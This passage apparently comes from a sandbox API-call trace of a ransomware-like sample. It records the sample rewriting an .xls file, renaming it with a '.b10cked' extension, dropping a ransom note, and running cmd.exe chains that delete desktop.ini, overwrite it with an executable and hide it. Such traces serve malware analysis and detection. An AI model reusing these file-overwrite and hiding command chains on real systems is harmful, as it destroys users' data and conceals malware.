lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.296] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.296] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0131.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\5d djXdWwSLPL XJ.xls" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\5d djxdwwslpl xj.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18808631460) returned 1 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.299] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.299] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa712 [0131.299] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.300] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xabfa [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xabfa [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.300] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x55fc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x55fc, lpOverlapped=0x0) returned 1 [0131.301] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.301] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x55fc, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x55fc, lpOverlapped=0x0) returned 1 [0131.301] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22012, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x55fe [0131.301] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x55fc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x55fc, lpOverlapped=0x0) returned 1 [0131.301] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22012, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x55fe [0131.301] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x55fc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x55fc, lpOverlapped=0x0) returned 1 [0131.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5d djXdWwSLPL XJ.xls", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5d djXdWwSLPL XJ.xls", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5d djXdWwSLPL XJ.xls", lpUsedDefaultChar=0x0) returned 20 [0131.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xabfa [0131.305] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.306] CloseHandle (hObject=0x114) returned 1 [0131.306] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\5d djXdWwSLPL XJ.xls", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS") returned 0x36 [0131.307] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0131.307] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa74, dwThreadId=0x958)) returned 1 [0131.312] CloseHandle (hObject=0x110) returned 1 [0131.312] CloseHandle (hObject=0x114) returned 1 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.312] CompareStringW (Locale=0x400, 
dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0131.312] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0131.312] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0131.312] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0131.313] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0131.313] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0131.313] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0131.313] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0131.313] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x968, dwThreadId=0xa80)) returned 1 [0131.489] CloseHandle (hObject=0x110) returned 1 [0131.489] CloseHandle (hObject=0x114) returned 1 [0131.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0xffffffff [0131.489] GetLastError () returned 0x2 [0131.489] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0131.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0131.493] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.493] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0131.493] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0131.493] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.493] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0131.493] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0131.493] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0131.493] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0131.494] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0131.494] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0131.494] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1") returned 0x29 [0131.494] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x162 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x162 [0131.494] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0131.494] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xaa4, dwThreadId=0xaa0)) returned 1 [0131.502] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0132.464] CloseHandle (hObject=0x114) returned 1 [0132.464] CloseHandle (hObject=0x110) returned 1 [0132.464] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.464] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0132.465] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0132.465] GetTickCount () returned 0x2a256 [0132.465] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18925388347) returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, 